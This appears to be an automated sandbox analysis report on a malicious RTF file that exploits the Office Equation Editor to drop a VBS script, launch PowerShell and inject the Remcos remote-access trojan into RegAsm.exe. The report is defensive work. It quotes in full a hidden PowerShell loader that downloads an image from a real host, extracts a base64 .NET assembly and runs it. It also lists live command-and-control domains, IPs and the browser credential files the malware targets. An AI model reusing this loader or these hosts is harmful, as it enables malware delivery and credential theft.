                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3884 Thread sleep time: -180000s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3824 Thread sleep count: 9250 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3824 Thread sleep time: -27750000s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0044E879 FindFirstFileExA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0040783C FindFirstFileW,FindNextFileW
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW
                      Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user
                      Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData
                      Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node (graph_15-49223)
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_035C059D mov edx, dword ptr fs:[00000030h]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_004432B5 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00412077 GetProcessHeap,HeapFree
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00434B47 SetUnhandledExceptionFilter
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Windows\SysWOW64\wscript.exe Network Connect: 104.21.84.67 443
                      Source: C:\Windows\SysWOW64\wscript.exe Domain query: paste.ee
                      Source: Yara match File source: Process Memory Space: powershell.exe PID: 3428, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: powershell.exe PID: 3544, type: MEMORYSTR
                      Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = '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
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_004120F7 GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00419627 mouse_event
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\coinfishingusagegirlsknow.vbs"
                      Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = '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
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MRHH/88082/6.13.271.701//:ptth' , '1' , 'C:\ProgramData\' , 'antre','RegAsm',''))} }"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\antre.vbs"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
Source: nots.dat.15.dr Binary or memory string: [Program Manager]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00434C52 cpuid 15_2_00434C52
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW,15_2_00452036
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,15_2_004520C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,15_2_00452313
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW,15_2_00448404
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,15_2_0045243C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,15_2_00452543
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,15_2_00452610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoA,15_2_0040F8D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,15_2_004488ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: IsValidCodePage,GetLocaleInfoW,15_2_00451CD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW,15_2_00451F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW,15_2_00451F9B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00448957 GetSystemTimeAsFileTime,15_2_00448957
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0041B60D GetUserNameW,15_2_0041B60D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,15_2_00449190
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

Source: Yara match File source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.powershell.exe.4449110.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.powershell.exe.4449110.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.628166706.0000000000791000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.446552841.0000000004266000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3544, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 3800, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\note\nots.dat, type: DROPPED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 15_2_0040BA12
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 15_2_0040BB30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: \key3.db 15_2_0040BB30

                      Remote Access Functionality

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-999Z97
Source: Yara match File source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.powershell.exe.4449110.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.powershell.exe.4449110.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.628166706.0000000000791000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.446552841.0000000004266000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3544, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 3800, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\note\nots.dat, type: DROPPED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: cmd.exe 15_2_0040569A
MITRE ATT&CK Matrix (numbers in parentheses are the counts shown next to each technique in the original matrix):

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Scripting (321) | Valid Accounts | Native API (11) | Scripting (321) | DLL Side-Loading (1) | Deobfuscate/Decode Files or Information (1) | OS Credential Dumping (1) | System Time Discovery (2) | Remote Services | Archive Collected Data (11) | Web Service (1) | Exfiltration Over Other Network Medium | System Shutdown/Reboot (1) |
| Credentials | Domains | Default Accounts | Exploitation for Client Execution (43) | DLL Side-Loading (1) | Bypass User Account Control (1) | Obfuscated Files or Information (2) | Input Capture (211) | Account Discovery (1) | Remote Desktop Protocol | Input Capture (211) | Ingress Tool Transfer (23) | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | Command and Scripting Interpreter (121) | Windows Service (1) | Access Token Manipulation (1) | Install Root Certificate (1) | Credentials In Files (2) | System Service Discovery (1) | SMB/Windows Admin Shares | Clipboard Data (3) | Encrypted Channel (21) | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Service Execution (2) | Registry Run Keys / Startup Folder (11) | Windows Service (1) | DLL Side-Loading (1) | NTDS | File and Directory Discovery (4) | Distributed Component Object Model | Input Capture | Non-Standard Port (1) | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | PowerShell (3) | Network Logon Script | Process Injection (322) | Bypass User Account Control (1) | LSA Secrets | System Information Discovery (34) | SSH | Keylogging | Remote Access Software (1) | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | Registry Run Keys / Startup Folder (11) | Masquerading (1) | Cached Domain Credentials | Security Software Discovery (2) | VNC | GUI Input Capture | Non-Application Layer Protocol (2) | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Modify Registry (1) | DCSync | Virtualization/Sandbox Evasion (21) | Windows Remote Management | Web Portal Capture | Application Layer Protocol (213) | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion (21) | Proc Filesystem | Process Discovery (3) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Access Token Manipulation (1) | /etc/passwd and /etc/shadow | Application Window Discovery (1) | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
| IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Process Injection (322) | Network Sniffing | System Owner/User Discovery (1) | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
| Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | Stripped Payloads | Input Capture | Remote System Discovery (1) | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption |

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
Behavior Graph ID: 1434624
Sample: nU7Z8sPyvf.rtf
Startdate: 01/05/2024
Architecture: WINDOWS
Score: 100

Behavior graph (process tree; the numbers after a process name are the counters shown on that graph node, see the legend above):

Start
  Signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Found malware configuration; 28 other signatures
  started WINWORD.EXE (336, 13)
    started EQNEDT32.EXE (12)
      DNS/IP: 107.172.31.6, ports 49165, 49169, 80, AS-COLOCROSSINGUS, United States
      dropped: C:\Users\...\coinfishingusagegirlsknow.vbs, Unknown
      dropped: C:\Users\user\...\indexphppagenotfound[1].gif, Unknown
      Signatures: Office equation editor establishes network connection; Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
      started wscript.exe (11)
        DNS/IP: paste.ee (Connects to a pastebin service (likely for C&C)); paste.ee 104.21.84.67, ports 443, 49166, CLOUDFLARENETUS, United States
        Signatures: System process connects to network (likely due to code injection or exploit); Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 5 other signatures
        started powershell.exe (4)
          Signatures: Suspicious powershell command line found; Suspicious execution chain found
          started powershell.exe (13, 6)
            DNS/IP: uploaddeimagens.com.br 172.67.215.45, ports 443, 49167, 49168, CLOUDFLARENETUS, United States
            Signatures: Creates autostart registry keys with suspicious values (likely registry only malware); Writes to foreign memory regions; Injects a PE file into a foreign processes
            started RegAsm.exe (3, 13)
              DNS/IP: sembe.duckdns.org (Uses dynamic DNS services); sembe.duckdns.org 194.187.251.115, ports 14645, 49170, M247GB, United Kingdom; geoplugin.net 178.237.33.50, ports 49171, 80, ATOM86-ASATOM86NL, Netherlands
              dropped: C:\Users\user\AppData\Local\Temp\...\nots.dat, data
              Signatures: Contains functionality to bypass UAC (CMSTPLUA); Detected Remcos RAT; Contains functionality to steal Chrome passwords or cookies; 4 other signatures
            started cmd.exe (1)
              dropped: C:\ProgramData\antre.vbs, ASCII
              Signatures: Command shell drops VBS files
    started EQNEDT32.EXE
  started wscript.exe

Antivirus detection for the submitted sample:

| Source | Detection | Scanner | Label |
|---|---|---|---|
| nU7Z8sPyvf.rtf | 63% | ReversingLabs | Document-RTF.Exploit.CVE-2017-11882 |
| nU7Z8sPyvf.rtf | 56% | Virustotal | (Browse) |
| nU7Z8sPyvf.rtf | 100% | Avira | HEUR/Rtf.Malformed |

No Antivirus matches
No Antivirus matches

Antivirus detection for domains:

| Source | Detection | Scanner | Label |
|---|---|---|---|
| sembe.duckdns.org | 12% | Virustotal | (Browse) |
| geoplugin.net | 4% | Virustotal | (Browse) |
| uploaddeimagens.com.br | 7% | Virustotal | (Browse) |

Antivirus detection for URLs (URL strings are reproduced as extracted from memory, including trailing junk characters):

| Source | Detection | Scanner | Label |
|---|---|---|---|
| http://ocsp.entrust.net03 | 0% | URL Reputation | safe |
| http://ocsp.entrust.net03 | 0% | URL Reputation | safe |
| https://contoso.com/License | 0% | URL Reputation | safe |
| https://contoso.com/Icon | 0% | URL Reputation | safe |
| https://contoso.com/Icon | 0% | URL Reputation | safe |
| http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe |
| http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe |
| http://geoplugin.net/json.gp | 100% | URL Reputation | phishing |
| http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe |
| http://geoplugin.net/json.gp/C | 100% | URL Reputation | phishing |
| https://contoso.com/ | 0% | URL Reputation | safe |
| http://go.microsoft.c | 0% | URL Reputation | safe |
| http://ocsp.entrust.net0D | 0% | URL Reputation | safe |
| https://www.google.com; | 0% | Avira URL Cloud | safe |
| https://uploaddeimagens.com.br/images/004/ | 0% | Avira URL Cloud | safe |
| http://app01.system.com.br/RDWeb/Pages/login.aspxd | 0% | Avira URL Cloud | safe |
| http://geoplugin.net/json.gp(GZ& | 0% | Avira URL Cloud | safe |
| sembe.duckdns.org | 100% | Avira URL Cloud | malware |
| https://uploaddeimagens.com.br/images/00 | 0% | Avira URL Cloud | safe |
| https://uploaddeimagens.com.br | 0% | Avira URL Cloud | safe |
| https://analytics.paste.ee; | 0% | Avira URL Cloud | safe |
| https://uploaddeimagens.com.br/images/00 | 3% | Virustotal | (Browse) |
| https://uploaddeimagens.com.br/images/004/ | 4% | Virustotal | (Browse) |
| https://uploaddeimagens.com.br | 7% | Virustotal | (Browse) |
| sembe.duckdns.org | 12% | Virustotal | (Browse) |
| http://app01.system.com.br/RDWeb/Pages/login.aspxd | 0% | Virustotal | (Browse) |
| https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029 | 14% | Virustotal | (Browse) |
| https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029 | 0% | Avira URL Cloud | safe |
| http://app01.system.com.br/RDWeb/Pages/login.aspx | 0% | Avira URL Cloud | safe |
| http://app01.system.com.br/RDWeb/Pages/login.aspxL | 0% | Avira URL Cloud | safe |
| https://cdnjs.cloudflare.com; | 0% | Avira URL Cloud | safe |
| http://107.172.31.6/28088/HHRM.txt | 0% | Avira URL Cloud | safe |
| http://app01.system.com.br/RDWeb/Pages/login.aspx70 | 0% | Avira URL Cloud | safe |
| http://app01.system.com.br/RDWeb/Pages/login.aspxL | 0% | Virustotal | (Browse) |
| http://app01.system.com.br/RDWeb/Pages/login.aspx | 0% | Virustotal | (Browse) |
Contacted domains:

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| sembe.duckdns.org | 194.187.251.115 | true | true | | unknown |
| paste.ee | 104.21.84.67 | true | false | | high |
| geoplugin.net | 178.237.33.50 | true | false | | unknown |
| uploaddeimagens.com.br | 172.67.215.45 | true | true | | unknown |

Contacted URLs:

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://paste.ee/d/e1cCs | false | | high |
| http://geoplugin.net/json.gp | true | URL Reputation: phishing | unknown |
| sembe.duckdns.org | true | 12%, Virustotal (Browse); Avira URL Cloud: malware | unknown |
| https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029 | true | 14%, Virustotal (Browse); Avira URL Cloud: safe | unknown |
| http://107.172.31.6/28088/HHRM.txt | true | Avira URL Cloud: safe | unknown |
URLs from memory and binary strings:

| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| http://nuget.org/NuGet.exe | powershell.exe, 0000000A.00000002.446552841.0000000003589000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://crl.entrust.net/server1.crl0 | wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| http://ocsp.entrust.net03 | wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown |
| https://paste.ee/d/e1cCsG | wscript.exe, 00000005.00000003.404639771.00000000003FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.401153718.00000000003F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.405126319.00000000003FF000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://contoso.com/License | powershell.exe, 0000000A.00000002.446552841.0000000003589000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://www.google.com; | wscript.exe, 00000005.00000003.403024830.0000000003840000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low |
| https://contoso.com/Icon | powershell.exe, 0000000A.00000002.446552841.0000000003589000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown |
                                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://analytics.paste.eewscript.exe, 00000005.00000003.403024830.0000000003840000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
